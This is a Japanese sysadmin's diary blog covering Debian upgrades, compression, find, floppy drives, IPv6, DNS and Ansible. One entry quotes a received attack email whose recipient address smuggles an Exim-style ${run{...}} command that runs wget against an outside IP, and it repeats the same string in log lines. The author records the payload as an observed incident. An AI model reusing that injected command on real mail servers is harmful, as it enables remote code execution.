屑俺日記
僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
2019-08-18(Sun) ちょっとばかり秋っぽく
☆ テザリングでdist-upgrade
MacMiniのstretchをbusterにあげた。sed -i s/stretch/buster/ の 後に、dist-upgrade。一時間半くらいか。
日本語IMが何だったのか忘れた。ともかく、設定していた
ON/OFFキーバインドも消えていた。
fcitxを放り込み、fcitx-config-gtk3で Ctrl-o に設定し
zenkaku-hankakuを削除。そしてuim-* をpurge。
とりあえずはそれ以外、問題なし。
$ lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 10 (buster) Release: 10 Codename: buster
☆ ちょっと頭をメールに戻すために
ここ一週間ほどから。
$ sudo sed -n '1p; $p' /var/log/mail.log | \
> awk '{print $1,$2,$3}'
Aug 11 06:25:38
Aug 18 07:45:01
$ sudo grep Invalid /var/log/mail.log | \
> awk -F':' '{print $5,$6}' | \
> sort | uniq -c | sort -n | tail -n5
6 unknown[68.183.179.17] SASL LOGIN authentication failed
7 unknown[165.22.146.224] SASL LOGIN authentication failed
167 unknown[134.209.31.192] SASL LOGIN authentication failed
600 unknown[185.234.219.118] SASL LOGIN authentication failed
5738 unknown[185.234.219.57] SASL LOGIN authentication failed
[ツッコミを入れる]
2019-08-13(Tue) 祝祭日でない休みの一日目
☆ zstd
知るのが遅かったが、早くてもどうということはなさげ。
junk フォルダをtarでアーカイブし、圧縮してみる。
単にアーカイブしただけのtarを除き、最大の圧縮率になる
オプションを付与。
$ find junk -type f | wc -l 38 $ du -h junk | tail -n1 3.7M junk
$ tar cf j.tar junk $ zstd -19 -zc j.tar.zst
$ ls -alFh j.* -rw-r--r-- 1 user group 5.6M 8月 13 07:26 j.tar -rw-r--r-- 1 user group 1.4M 8月 13 07:30 j.tar.bz2 -rw-r--r-- 1 user group 1.7M 8月 13 07:30 j.tar.gz -rw-r--r-- 1 user group 853K 8月 13 07:31 j.tar.xz -rw-r--r-- 1 user group 967K 8月 13 07:34 j.tar.zst
デフォルトではgzip(--bestを付けても付けなくても同じようだ)と あまり変わらなかった。目一杯圧縮率をあげてやると、やはり少し 遅くなった。
$ time zstd -zc j.tar >/dev/null j.tar : 29.28% (5836800 => 1708990 bytes, /*stdout*\) real 0m0.101s user 0m0.096s sys 0m0.000s $ time zstd -19 -zc j.tar >/dev/null j.tar : 16.96% (5836800 => 989747 bytes, /*stdout*\) real 0m2.267s user 0m2.212s sys 0m0.048s
[ツッコミを入れる]
2019-08-10(Sat) 夏も盛りか
☆ phpmyadmin
前回に書いたのは
ほんの一年前か。
WordPressついでにbasercmsも試してみながら、データベースの
構造を少し見たくなって、bionicに入れてみる。もちろん
他所様にアクセスされにくいよう、適当にファイアウォールは
かけている。
なんか 面白そうなエラーが出た。
DROP tcp -- !$UNICAST_IPv4 0.0.0.0/0 multiport dports 80,443,3306
Warning in ./libraries/sql.lib.php#613 count(): Parameter must be an array or an object that implements Countable Backtrace ./libraries/sql.lib.php#2128: PMA_isRememberSortingOrder(array) ./libraries/sql.lib.php#2079: PMA_executeQueryAndGetQueryResponse( array, boolean true, string 'basercms', string 'mysite_users',
てけとうに検索すると、根本的にはバージョン(4:4.6.6-5)が古すぎるのが問題点
と思えた。本家バージョン(
ちなみに本家の最新安定版は
4.9.0.1)で
2年半ほど前、そして
bionicのChangelogでも
2年前。
もちろん
脆弱性情報はその後もちびちびと出続けて。
[ツッコミを入れる]
2019-08-06(Tue) 曇っているかも
☆ find -and
前に書いたかもしれないが、まぁいいか。
$ for x in `seq 9`; do touch -d 2019070${x} 2019070${x}.txt; done
$ ls -l
合計 0
-rw-rw-r-- 1 user group 0 7月 1 00:00 20190701.txt
-rw-rw-r-- 1 user group 0 7月 2 00:00 20190702.txt
-rw-rw-r-- 1 user group 0 7月 3 00:00 20190703.txt
-rw-rw-r-- 1 user group 0 7月 4 00:00 20190704.txt
-rw-rw-r-- 1 user group 0 7月 5 00:00 20190705.txt
-rw-rw-r-- 1 user group 0 7月 6 00:00 20190706.txt
-rw-rw-r-- 1 user group 0 7月 7 00:00 20190707.txt
-rw-rw-r-- 1 user group 0 7月 8 00:00 20190708.txt
-rw-rw-r-- 1 user group 0 7月 9 00:00 20190709.txt
$ find . -type f -mtime -33 -exec ls -alFh {} \; | sort
-rw-rw-r-- 1 user group 0 7月 5 00:00 ./20190705.txt
-rw-rw-r-- 1 user group 0 7月 6 00:00 ./20190706.txt
-rw-rw-r-- 1 user group 0 7月 7 00:00 ./20190707.txt
-rw-rw-r-- 1 user group 0 7月 8 00:00 ./20190708.txt
-rw-rw-r-- 1 user group 0 7月 9 00:00 ./20190709.txt
$ find . -type f -mtime +30 -exec ls -alFh {} \; | sort
-rw-rw-r-- 1 user group 0 7月 1 00:00 ./20190701.txt
-rw-rw-r-- 1 user group 0 7月 2 00:00 ./20190702.txt
-rw-rw-r-- 1 user group 0 7月 3 00:00 ./20190703.txt
-rw-rw-r-- 1 user group 0 7月 4 00:00 ./20190704.txt
-rw-rw-r-- 1 user group 0 7月 5 00:00 ./20190705.txt
-rw-rw-r-- 1 user group 0 7月 6 00:00 ./20190706.txt
$ find . -type f -mtime +30 -and -mtime -33 -exec ls -alFh {} \; | sort
-rw-rw-r-- 1 user group 0 7月 5 00:00 ./20190705.txt
-rw-rw-r-- 1 user group 0 7月 6 00:00 ./20190706.txt
[ツッコミを入れる]
2019-08-05(Mon) 久々
☆ 超久々のフロッピー
偶然、
USBのフロッピーディスクドライブ
とメディア(IMATION 2HD)が手元にあった。
このところ
サポートを中止するの
しないのと色々。
もっともUSBだから本品は関係ないはずだけど。
手近な bionicに挿してみる。
カーネル(4.15.0-55-generic)のconfigは、
CONFIG_INTEL_IOMMU_FLOPPY_WA=y であった。
[ 1761.562968] usb 3-6: new full-speed USB device number 6 using xhci_hcd [ 1761.713460] usb 3-6: New USB device found, idVendor=057b, idProduct=0000 [ 1761.713465] usb 3-6: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 1761.713468] usb 3-6: Product: USB Floppy Drive [ 1761.713470] usb 3-6: Manufacturer: Y-E DATA [ 1761.792579] usb-storage 3-6:1.0: USB Mass Storage device detected [ 1761.792664] scsi host5: usb-storage 3-6:1.0 [ 1761.792744] usbcore: registered new interface driver usb-storage [ 1762.821216] scsi 5:0:0:0: Direct-Access Y-E DATA USB-FDU 5.01 PQ: 0 ANSI: 0 CCS [ 1762.821920] sd 5:0:0:0: Attached scsi generic sg2 type 0 [ 1762.837054] sd 5:0:0:0: Power-on or device reset occurred [ 1762.901119] sd 5:0:0:0: [sdb] Attached SCSI removable disk
ロードされたデバイスドライバはusb_storageだけだった。
フロッピーディスクを入れてみた。
$ sudo fdisk -l /dev/sdb ディスク /dev/sdb: 1.4 MiB, 1474560 バイト, 2880 セクタ 単位: セクタ (1 * 512 = 512 バイト) セクタサイズ (論理 / 物理): 512 バイト / 512 バイト I/O サイズ (最小 / 推奨): 512 バイト / 512 バイト ディスクラベルのタイプ: dos ディスク識別子: 0x6f20736b デバイス 起動 開始位置 最後から セクタ サイズ Id タイプ /dev/sdb1 778135908 1919645538 1141509631 544.3G 72 不明 /dev/sdb2 168689522 2104717761 1936028240 923.2G 65 Novell Netware 386 /dev/sdb3 1869881465 3805909656 1936028192 923.2G 79 不明 /dev/sdb4 0 3637226495 3637226496 1.7T d 不明 パーティション情報の項目がディスクの順序と一致しません
フロッピーの中身をdd(1)で吸い出してみたが、
$ sudo losetup /dev/loop0 fdd.img losetup: fdd.img: ループバックデバイスの設定に失敗しました: デバイスもしくはリソースがビジー状態です
新たにfdiskすると、普通に利用できるようだ。
$ time sudo mkfs -t ext4 /dev/sdb1 mke2fs 1.44.1 (24-Mar-2018) Filesystem too small for a journal Creating filesystem with 1436 1k blocks and 184 inodes Allocating group tables: done Writing inode tables: done Writing superblocks and filesystem accounting information: done real 0m5.968s user 0m0.017s sys 0m0.007s
1MBのファイルコピーには1秒かからなかったが、その直後にsyncすると 13秒。
$ time sudo cp 1M.img /media/makoto/c8091ef5-8382-4301-81b1-8c17fc8db40e/ real 0m0.961s user 0m0.012s sys 0m0.007s
$ time sync real 0m13.246s user 0m0.001s sys 0m0.002s
もともとあったデータを書き戻すのに
$ time sudo dd if=fdd.img of=/dev/sdb 2880+0 レコード入力 2880+0 レコード出力 1474560 bytes (1.5 MB, 1.4 MiB) copied, 85.6155 s, 17.2 kB/s real 1m25.632s user 0m0.019s sys 0m0.044s
書き込み時でないときも間欠的に響く、 唸るような動作音でひとしきり懐旧の念にひたると。
[ツッコミを入れる]
2019-07-29(Mon) 真夏
☆ find 複数判別式
記述のエラーとしばらく格闘する。
letsencrypt$ sudo find . -type l \
> \( -name fullchain\*.pem -or -name privkey\*.pem \) \
> -exec ls -alF {} \;
lrwxrwxrwx 1 root root 51 7月 29 18:23 ./live/DOMAIN/fullchain.pem ->
../../archive/DOMAIN/fullchain6.pem
lrwxrwxrwx 1 root root 49 7月 29 18:23 ./live/DOMAIN/privkey.pem ->
../../archive/DOMAIN/privkey6.pem
[ツッコミを入れる]
2019-07-23(Tue) 長く書いてないが、時には
☆ v6アドレス手打ち割当
クラウドの再インストールで、固定で割り当てていたIPv6アドレス
がなくなってしまった。/etc/network/interfacesに書いたが、
再起動が面倒になった。
環境は xenial 64bit。
$ sudo ip -6 addr add dev eth0 UNICAST_IPV6_ADDR/64 $ sudo ip -6 route add default via fe80::1 dev eth0 $ sudo ip -6 route show UNICAST_IPv6_ADDR/64 dev eth0 proto kernel metric 256 pref medium fe80::/64 dev eth0 proto kernel metric 256 pref medium default via fe80::1 dev eth0 metric 1024 pref medium
これでリモートのping6に応答するようになった。
gateway は環境によっては違うかも。
[ツッコミを入れる]
2019-07-05(Fri) 降るかと思ったら降らないっぽい
☆ 片方には伝わって、片方には伝わらない
新しいホストをVPSで立てて、IPv4、IPv6を設定し、
ともにDNSサーバに登録する。
IPv4は問題なく、すぐ解決できた。
しかし、同じVPSでIPv6の名前解決に成功したり失敗したり。
$ cat /etc/resolv.conf search DOMAIN.TLD nameserver SERVER_A nameserver SERVER_B
$ dig @SERVER_A MYHOST.DOMAIN.TLD AAAA +noall +answer ; <<>> DiG 9.10.3-P4-Debian <<>> @SERVER_A MYHOST.DOMAIN.TLD AAAA +noall +answer ; (1 server found) ;; global options: +cmd $ dig @SERVER_B MYHOST.DOMAIN.TLD AAAA +noall +answer ; <<>> DiG 9.10.3-P4-Debian <<>> @SERVER_B MYHOST.DOMAIN.TLD AAAA +noall +answer ; (1 server found) ;; global options: +cmd MYHOST.DOMAIN.TLD. 3076 IN AAAA QUAD_ADDR
DOMAIN.TLD のNS2つに問い合わせて、問題なしを得た。
@8.8.8.8 や @1.1.1.1もちゃんと返った。
SERVER_Aに+trace をつけるとAAAAは返ってきたが、無しだと
やはり駄目だった。
今はどちらもOKになっているが、いつなったのかは見過ごしていた。
[ツッコミを入れる]
2019-06-30(Sun) 曇って大風
☆ bionic色々
bionicでansible色々。
LXCとconoha VPSは通るplaybookが、さくらのVPSに限って
初っ端からひっかかってしまう。
- name: copy apt conf
copy: src=files/{{ debian_code }}.list \
dest=/etc/apt/sources.list
become: yes
$ time ansible-playbook hoge.yml
____________
<PLAY [SERVER]>
------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
________________________
<TASK [Gathering Facts]>
------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
ok: [SERVER_NAME]
_______________________________
<TASK [common : copy apt conf]>
-------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
fatal: [SERVER_NAME]: FAILED! =>
{"msg": "Failed to get information on remote file
(/etc/apt/sources.list):
Connection to SERVER_NAME closed.\r\n"}
どうもpasswordで嵌っていたらしい。
ansibleのログインユーザのパスワードを設定し、hostsにも
ansible_sudo_passwordを指定してやるとできてしまった。
ログインは公開鍵認証に設定していたし、sudo もpasswordを要求
されなかったが、パスワード設定自体は(よく分からないが)
要ったらしい。
[ツッコミを入れる]
2019-06-20(Thu) 今日も曇ってるが、降らないっぽい
☆ どうやら攻撃メール着弾とみた。
Sylpheedで妙なのが。
件名 差出人 日付 (件名なし)(差出人不明)(日付なし) (件名なし)(差出人不明)(日付なし) (件名なし)(差出人不明)(日付なし)
メールは次のような内容だった。
Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MY_DOMAIN
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MY_DOMAIN
Received: from service.com (unknown [46.101.19.140])
by $MAIL_SERVER (Postfix) with SMTP id 79287360200;
Thu, 20 Jun 2019 00:38:09 +0900 (JST)
Authentication-Results: $MAIL_SERVER; dkim=permerror (bad message/signature format)
Received: 1
Received: 2
Received: 3
.
.
.
Received: 31
ついでにログも。
$ sudo grep 79287360200 /var/log/mail.log | sed 's/^.\{24\}//'
postfix/smtpd[6458]: 79287360200: client=unknown[46.101.19.140]
postfix/cleanup[6463]: 79287360200: message-id=<>
opendkim[664]: 79287360200: can't determine message sender; accepting
postfix/qmgr[815]: 79287360200: from=<support@service.com>,
size=715, nrcpt=3 (queue active)
postfix/virtual[6465]: 79287360200:
to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MYDOMAIN>,
relay=virtual, delay=1.3, delays=1.3/0.01/0/0, dsn=2.0.0, status=sent (delivered to maildir)
postfix/local[6464]: 79287360200:
to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@localhost>,
relay=local, delay=1.4, delays=1.3/0.04/0/0.01, dsn=2.0.0, status=sent (forwarded as 8FA38360235)
postfix/local[6464]: 79287360200:
to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MAIL_SERVER>,
relay=local, delay=1.4, delays=1.3/0.05/0/0, dsn=2.0.0, status=sent (forwarded as 926CF36026C)
postfix/qmgr[815]: 79287360200: removed
☆ 適当にチェック。
メールサーバーのFQDNを こちらに投げてみた。
Connecting to SERVER_IPv4_ADDR 220 MAIL_SERVER ESMTP Postfix (Debian/GNU) [852 ms] EHLO keeper-us-east-1b.mxtoolbox.com 250-MAIL_SERVER 250-PIPELINING 250-SIZE 31457280 250-ETRN 250-STARTTLS 250-AUTH CRAM-MD5 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 SMTPUTF8 [788 ms] MAIL FROM:<supertool@mxtoolbox.com> 250 2.1.0 Ok [805 ms] RCPT TO:<test@mxtoolboxsmtpdiag.com> 454 4.7.1 <test@mxtoolboxsmtpdiag.com>: Relay access denied [786 ms] LookupServer 5122ms
こちらのログも。
$ sudo grep 11970 /var/log/mail.log | sed 's/^.\{24\}//'
postfix/smtpd[11970]: connect from keeper-us-east-1b.mxtoolbox.com[52.55.244.91]
postfix/smtpd[11970]: NOQUEUE:
reject: RCPT from keeper-us-east-1b.mxtoolbox.com[52.55.244.91]: 454 4.7.1
<test@mxtoolboxsmtpdiag.com>: Relay access denied;
from=<supertool@mxtoolbox.com>
to=<test@mxtoolboxsmtpdiag.com>
proto=ESMTP helo=<keeper-us-east-1b.mxtoolbox.com>
postfix/smtpd[11970]: disconnect from keeper-us-east-1b.mxtoolbox.com[52.55.244.91]
ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4
[ツッコミを入れる]
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。